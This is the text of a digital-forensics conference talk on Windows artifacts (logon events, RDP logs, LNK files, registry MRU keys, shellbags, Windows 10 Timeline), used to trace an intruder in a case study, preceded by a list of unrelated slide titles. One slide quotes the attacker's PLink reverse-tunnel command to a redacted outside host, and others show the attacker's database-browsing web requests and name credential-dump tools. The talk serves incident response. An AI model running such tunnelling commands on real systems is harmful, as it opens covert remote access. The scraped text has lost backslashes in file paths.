PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
KodekX | Application Modernization Development
KodekX
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Cloud computing and distributed systems.
kkkkkhan
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Approach and Philosophy of On baking technology
30anthuong17
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 

Kealy OWASP interactive_artifacts

  • 1. 1 Using Interactive Artifacts to Track Attacker Actions § Phillip Kealy
  • 2. 2 Overview § Background § Disclaimer § Presentation Goals § Interactive Artifact Overview § Case Study + Interactive Artifacts § Scaling Investigations using Interactive Artifacts
  • 3. 3 Background § Who am I? § Career - Operational - CIRT - Security Manager - Consulting
  • 4. 4 DISCLAIMER Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
  • 5. 5 Presentation Goals § Define Methods for Interactive Logons § Provide overview of available artifacts § Methods to use multiple evidence sources to provide in-depth story
  • 6. 6 What are Interactive artifacts? § Forensic Artifacts that record user activity during an interactive logon session § Examples of interactive logon sessions: - Physically at the keyboard - Remote Desktop - Third Party Utilities • Screen Connect • VNC • More - PsExec
  • 7. 7 User Profiles What happens upon a user’s first interactive user logon? § Log Entries (More on this shortly) § Creation of user profile - “C:users%USERNAME%” - User registry hives § A user profile can prove an interactive logon occurred, even without event log evidence RDP frank ITJumpServer “C:usersfrank*” created
  • 8. 8 Case Study – FIN9 § Financially Motivated Attacker § Uses minimal malware for initial access and to maintain presence § Exploits business processes and systems for financial gain
  • 9. 9 Targeted Attack Lifecycle – FIN9 • Phishing Email • Word document with macros • Netwire • TeamViewer • ScreenConnect • EMCO • Dameware • NanoCore • MimiKatz • Keystroke logging • Fake Logon Screen • Sticky Keys • Built-in Windows Utilities • Net commands • File shares • Search for systems of interest • Legitimate Access to apps • Direct DB access using 1ClickDB • Remote Desktop • File Shares • Netwire • TeamViewer • ScreenConnect • EMCO • SoftTokenCertificate theft
  • 11. 11 Initial Lead § Fraud Department located Unauthorized Gift Cards issued on January 22, 209 § Suspicious rewards Database interaction on January 22, 2019 traced back to WebServerA § Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session on WebServerA using Domain Admin account Frank - RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address § IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of ITJumpServer - Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC § Now what? - Live response analysis of WebServerA
  • 12. 12 Windows Logon Events Type 2 – Interactive - Physical console - Screen sharing - “RunAs” - PsExec Type 10 – Remote Interactive - Remote Desktop / Terminal Services Type 7 – Credentials used to unlock screen Type 12 – Cached remote interactive Type 13 – Cached unlock
  • 13. 13 Type 10 Logon – RDP Unknown System An account was successfully logged on. User Name: franktheadmin Domain: Rewards Logon ID: (0x0,0x151F248) Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: ITJumpServer Source Network Address: 192.168.1.101 RDP “Rewards” Domain Controller Security Event Log EID 4624 ITJumpServer
  • 14. 14 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2019-01-22 01:33:23 1149 Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23 21 Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:39:45 23 Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45 24 Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101
  • 15. 15 User Registry Hives Users<username> Windows Vista/2008+ NTUSER.DAT HKEY_USERS<User SID>_Classes HKEY_USERS<User SID> Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT Registry Hive PathsRegistry Files on Disk
  • 16. 16 LNK Files § Windows shortcut files § Auto-generated when file opened in Explorer § Supports “Recent Files” / “Recent Docs” functionality Windows Vista, 7, Server 2008 – LNK File Paths C:Users%USERNAME%AppDataRoamingMicrosoftWindowsRecent C:Users%USERNAME%AppDataRoamingMicrosoftOfficeRecent
  • 17. 17 Data within LNK Files § Full file path (local or network) § Attributes and logical size § MAC timestamps for the referenced file at the time it was last opened § Output from “lnkparse.py” lnkparse.py - sourceforge.net/projects /jafat/files/lnk-parse/
  • 18. 18 LNK File of interest Date & Time Timestamp File Name 2019-01-22 01:39:23 Created C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk Date & Time Timestamp 2019-01-22 01:36:23 Created, Modified, Accessed C:UsersdaveDesktopresult.txt
  • 19. 19 Most Recently Used (MRU) Keys “RecentDocs” Recently opened files Multiple Subkeys for file types HKEY_USERS{SID}SoftwareMicrosoftWindowsCu rrentVersionExplorerRecentDocs .ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc. § Binary Format § Stores most recent 10 opened files Key Last Write Registry Key Parsed MRU Value 2019-01-22 01:36:23 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.txt 0 = result.txt 2019-01-22 01:35:34 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.zip 0 = omg.zip
  • 20. 20 Anatomy of a Registry Key Example: Run key Key: HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun Value Name: NotMalware Value Data: C:ProgramDataTotallyMalwareEvil.exe
  • 21. 21 Anatomy of a Registry Key Example: Run key Key Last Modified: 2017-06-05 19:33:51 § Values inherit Last Modified time from their parent key
  • 22. 22 A timestamp is applied to the ‘Key’, and is updated when… 1) Key created 2) Value created/deleted 3) Data of any Value is modified Note: Registry timestamps can be modified, although this is not very common Registry Timestamps
  • 23. 23 Evidence of Execution Default Enabled User Agnostic All Windows Versions Execution Visibility ShimCache Yes Yes Yes Yes AmCache Yes Yes No Yes UserAssist Yes No Yes GUI only MUICache Yes No Yes GUI only Prefetch Workstations only Yes Yes Yes Windows Events No Yes Yes Yes WMI RUA No Yes Yes Yes
  • 24. 24 UserAssist and MUICache Tracks files opened in Windows Explorer HKCU{SID}SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist HKCU{SID}SoftwareMicrosoftWindowsShellNoRoamMUICache UserAssist One value per executable file • ROT13 encoded Number of times each program ran Last execution time MUICache One value per executable file • Clear-text Records “FileDescription” for PE files
  • 25. 25 UserAssist Evidence userassist v.20080726 (NTUSER.DAT) Displays contents of UserAssist Active Desktop key UserAssist (Active Desktop) SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{75048700-EF1F-11D0-9888- 006097DEACF9}Count LastWrite Time Fri Jul 29 21:46:41 2011 (UTC) Fri Jul 29 21:46:41 2017 (UTC) UEME_RUNPATH (3) UEME_RUNPATH:C:Program Files7-Zip7zFM.exe (1) Fri Jul 29 21:46:17 2017 (UTC) UEME_RUNPATH:C:Program FilesWindows NTAccessoriesWORDPAD.EXE (1) Fri Jul 29 21:44:45 2017 (UTC) UEME_RUNPIDL:%csidl2%Internet Explorer.lnk (15) UEME_RUNPATH:C:Program FilesInternet ExplorerIEXPLORE.EXE (1) Raw contents of UserAssist key Decoded UserAssist data
  • 27. 27 Decoded User Assist Data Key Last Write Registry Key Times Executed 2019-01-22 01:36:23 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}msiexec.exe 1 2019-01-22 01:33:48 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}ServerManager.exe 1 2019-01-22 01:39:23 C:UsersdaveDesktopomg.exe 1 2019-01-22 01:43:23 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 1 2019-01-22 01:44:56 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 1 2019-01-22 02:28:01 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 3
  • 28. 28 Jump Lists § Provides user quick access to recently used apps § Each user has their own jump lists § Shows evidence of accessed resources § Two types of jump lists § Requires parsing to be human readable - JumpListParser, JLECmd, jmp Automatic %APPDATA%MicrosoftWindowsRecentAutomaticDestinations Custom %APPDATA%MicrosoftWindowsRecentCustomDestinations
  • 29. 29 Jump Lists § Automatic – created automatically when a user interacts with a resource • Custom – created when a user “pins” an item
  • 30. 30 Browser History, Cache, and Downloads § User Specific Artifact § Enumerate Browsers § Extract Browsing History § Collect Browser Cache § Collect Downloaded Files
  • 31. 31 Web Server Side Data - Logging GET vs. POST GET Requests “Retrieve” content specified in the request address Key-value pairs passed as part of URI Fully captured in logs (cs-uri-query) Impact: Malicious activity in POST requests can be hard to detect! POST Requests Tell the server to accept the data enclosed in the packet contents Key-value pairs passed in the message body Request parameters not logged
  • 32. 32 Web Server Side Data - Content Encoding § Special characters in HTTP requests are URL Encoded by the web browser - % followed by ASCII character code - Spaces can be represented by %20 or + http://www.foo.com/search.aspx?name=John & Mark Co.&op=1 …is converted to (and will be logged as)… http://www.foo.com/search.aspx?name= John%20%26%20Mark%20Co.&op=1
  • 33. 33 GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG" GET /images/Schema.asp GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS” &sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_U SERS"& GET /images/Connect.asp GET /images/Schema.asp GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM> _USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A= GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
  • 34. 34 What do we know so far? Time Source Details 2019-01-22 01:33:23EventLog Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 § What next?
  • 36. 36 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2018-12-24 23:11:21 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 00:23:33 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
  • 38. 38 RDP MRU Keys Key Last Write Registry Key 2018-12-25 00:00:23 Hostname: 192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42 Hostname: RewardsDB User: rewardsDBO 2019-01-01 02:53:11 Hostname: Webserver2 User: rewardsfrank 2019-01-15 00:15:01 Hostname: ITJumpserver User: rewardsdave
  • 39. 39 RDP Bitmap Cache Files § Store frequently used images used during RDP session § Improves user experience § Located at: - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCachebcache2.bmc - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCacheCache[0-9]{4}.bin
  • 40. 40
  • 41. 41 Uninstall or Disable Endpoint Agents
  • 42. 42 Registry Shellbags § Windows Explorer usage § Records size, position, view of windows § Provides evidence of user access to local & remote directories HKEY_USERS{SID}SoftwareMicrosoftWindowsShell HKEY_USERS{SID}SoftwareMicrosoftWindowsShellNoRoam Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT
  • 43. 43 Registry Shellbags Decoded shellbag keys can provide - Paths to directories accessed via Explorer - Date and time at which last access occurred - MAC times of each path tracked in shellbags Decoding tools - RegRipper - shellbags.py github.com/williballenthin/shellbags - ShellBagsExplorer • https://ericzimmerman.github.io/#!index.md
  • 44. 44 ShellBags MRU Time Modified Accessed Created Resource 2019-01-11 03:51:36 2018-12-30 02:59:32 2016-12-30 02:59:32 2017-11-05 14:40:54 My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54 2018-05-07 15:54:36 2016-11-05 14:40:54 2017-11-05 14:40:54 My ComputerC:UsersITAdminAppData [Desktop00430] My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2018-12-25 02:40:59 2012-11-11 17:00:06 2012-11-11 17:00:06 2012-11-11 17:00:06 My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59 2014-05-23 21:53:24 2018-05-23 21:53:24 2011-04-07 12:28:28 My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2019-01-12 03:41:41 2017-01-10 14:07:12 2017-01-10 14:07:12 2017-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:42:22 2017-01-11 18:42:04 2017-01-11 18:42:04 2017-01-10 14:06:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49 2017-01-05 21:37:52 2017-01-05 21:37:52 2017-01-05 20:05:26 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:41:42 2016-12-18 14:49:14 2016-12-18 14:49:14 2015-01-26 19:43:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:53:14 2016-12-15 20:57:58 2016-12-15 20:57:58 2016-11-24 22:18:00 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47 2015-09-23 13:52:10 2015-09-23 13:52:10 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-11 03:46:21 2016-09-27 13:38:42 2016-09-27 13:38:42 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010]
  • 45. 45 How did the attacker access the host? § Remotely installed ScreenConnect § Switched Tactics and removed ScreenConnect/Installed malware § Non-Interactive malware used to download and execute PLink.exe to create tunnel - tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389 § Connected to local host using remote desktop Key Value Data SoftwareSimonTatham PuTTYSshHostKeys rsa2@<IP Address> 0x10001,0x SSH Public Key
  • 46. 46 Windows 10 Timeline § Timeline exists in Task View - Accessed by hitting Win+Tab § Records timeline of user activity for specific applications § User Engaged § Generic Events § Database location: - C:UsersUserAppDataLocalConnectedDevicesPlatformL.UserActivitiesCache.db
  • 49. 49 Windows Timeline § Parsing - Multiple Available Tools • https://tzworks.net/prototype_page.php?proto_id=41 • https://github.com/log2timeline/plaso/pull/2076 • https://ericzimmerman.github.io/#!index.md - SQLite3
  • 50. 50 Windows 10 Timeline Start - UTC End - UTC Application DisplayText or Type Details 2019-02-08 23:04:27N/A WinRARWinRAR.exe sdl-redline.zip Z:Downloadssdl-redline.zip 2019-02-09 01:07:06N/A Cisco.AnyConnect Cisco AnyConnect Secure Mobility Client black 2019-02-10 13:09:53N/A Microsoft.MicrosoftEdge cmd - Bing https://www.bing.com/search?q=cmd&form=WNSGPH http://adaptivecards[.]io/schemas/adaptive-card.json 2019-02-10 13:10:34 2019-02-10 13:10:51Microsoft.MicrosoftEdge UserEngaged https://ericzimmerman.github.io/#!index.md 2019-02-12 13:58:46 2019-02-12 13:58:48Microsoft.MicrosoftEdge UserEngaged https://www.google.com/search?eiadd+on+vpn&oq=add +on+vpn 2019-02-12 13:59:02N/A WiresharkWireshark.exe Wireshark black 2019-02-12 18:57:11N/A WiresharkWireshark.exe 107.x.x.x-10.24.206.133- 1552495684.flow Z:Downloads107.x.x.x-10.24.206.133- 1552495684.flow 2019-02-12 19:02:27N/A WiresharkWireshark.exe 104.x.x.x-10.222.7.44- 1552442420.flow Z:Downloads104.x.x.x-10.222.7.44-1552442420.flow 2019-02-16 00:47:42N/A Microsoft.MSPaint Paint 3D black 2019-02-16 00:50:34N/A Microsoft.MSPaint Picture2.jpg Z:DesktopPicture2.jpg 2019-02-16 03:16:13N/A mspaint.exe Picture1.png Z:PresentationsDFIRPicture1.png 2019-02-16 03:16:56N/A mspaint.exe Picture2.png Z:PresentationsDFIRPicture2.png 2019-02-16 18:41:00N/A WinRARWinRAR.exe 4mXTuLp5E19cNdVvUX9jzb.zip Z:DownloadsTuLp5E19cNdVvUX9jzb.zip 2019-02-16 18:41:33N/A RedlineRedline.exe MBP0074.mans Z:MBP0074.mans
  • 52. 52 Time Source System Details 2018-12-24 23:11:21EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2018-12-25 00:00:23RDP:MRU ConfPC Hostname:192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42RDP:MRU ConfPC Hostname:RewardsDB User: rewardsDBO 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-01 02:53:11RDP:MRU ConfPC Hostname:Webserver2 User: rewardsfrank 2019-01-11 03:46:21ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010] 2019-01-11 03:51:36ShellBag:MRU ConfPC My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54ShellBag:MRU ConfPC My ComputerC:UsersITAdminAppData [Desktop00430] 2019-01-12 03:41:41ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:41:42ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:42:22ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:53:14ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2019-01-15 00:15:01RDP:MRU ConfPC Hostname:ITJumpserver User:rewardsdave 2019-01-22 00:23:33EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time Jump C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time Jump C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave Jump C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Jump Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Jump Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:55:45EventLog ConfPC Remote Desktop Services: Session has been disconnected: User: rewardsITAdmin Session ID: 2 Source Network Address: 127.0.0.1
  • 53. 53 Case Study – Expanding View § Shellbags § RDP Logs § RDP Connections § LNK Files § MRU Keys § MuiCache § Jump Lists § RDP Bitmap Cache § SimonTathom Registry Values § Windows 10 Timeline
  • 54. 54 Other fun Artifacts Details Windows Recycler C:$Recycle.Bin<SID> $R<RAND>.<EXT> $I<RAND>.<EXT> Browser History ftp://<AttackerWebsite> file:///C:/Windows/127.0.0.1.pwdump OpenWith Registry Keys SoftwareMicrosoftWindowsCurrentVersionExplorerFileExts .cachedumpOpenWithList .fgdump-logOpenWithList ViClient Logs C:UsersadminAppDataLocalVMwarevpxviclient-#-0000.log